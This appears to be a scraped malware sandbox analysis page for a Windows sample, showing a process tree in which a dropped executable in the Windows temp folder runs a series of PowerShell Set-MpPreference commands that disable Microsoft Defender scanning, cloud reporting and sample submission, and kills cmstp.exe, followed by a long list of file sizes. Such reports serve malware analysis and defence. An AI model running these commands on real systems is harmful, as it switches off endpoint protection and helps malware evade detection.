- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 24⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cmstp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\temp\tmnj3xnh.exe2⤵
-
C:\Windows\temp\tmnj3xnh.exeC:\Windows\temp\tmnj3xnh.exe3⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 64⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 64⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 64⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 24⤵
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cmstp.exe /F2⤵
- Kills process with taskkill
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.9MB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
9.9MB
-
Filesize
9.9MB
-
Filesize
328KB
-
Filesize
64KB
-
Filesize
108KB
-
Filesize
104KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
9.9MB
-
Filesize
6.9MB
-
Filesize
9.9MB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
204KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
240KB
-
Filesize
88KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.0MB
-
Filesize
328KB
-
Filesize
64KB
-
Filesize
9.9MB
-
Filesize
9.9MB
-
Filesize
9.9MB
-
Filesize
6.9MB
-
Filesize
9.9MB
-
Filesize
9.9MB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
72KB
-
Filesize
6.9MB
-
Filesize
604KB
-
Filesize
604KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
9.9MB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
224KB
-
Filesize
224KB
-
Filesize
224KB
-
Filesize
6.9MB
-
Filesize
9.9MB
-
Filesize
196KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
1.0MB
-
Filesize
6.9MB
-
Filesize
9.9MB
-
Filesize
48KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
32KB
-
Filesize
9.9MB
-
Filesize
9.9MB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
800KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
744KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
208KB
-
Filesize
208KB
-
Filesize
9.9MB
-
Filesize
9.9MB
-
Filesize
9.9MB
-
Filesize
6.9MB
-
Filesize
284KB
-
Filesize
64KB
-
Filesize
328KB
-
Filesize
4KB
-
Filesize
588KB
-
Filesize
588KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
356KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
364KB
-
Filesize
6.9MB
-
Filesize
9.9MB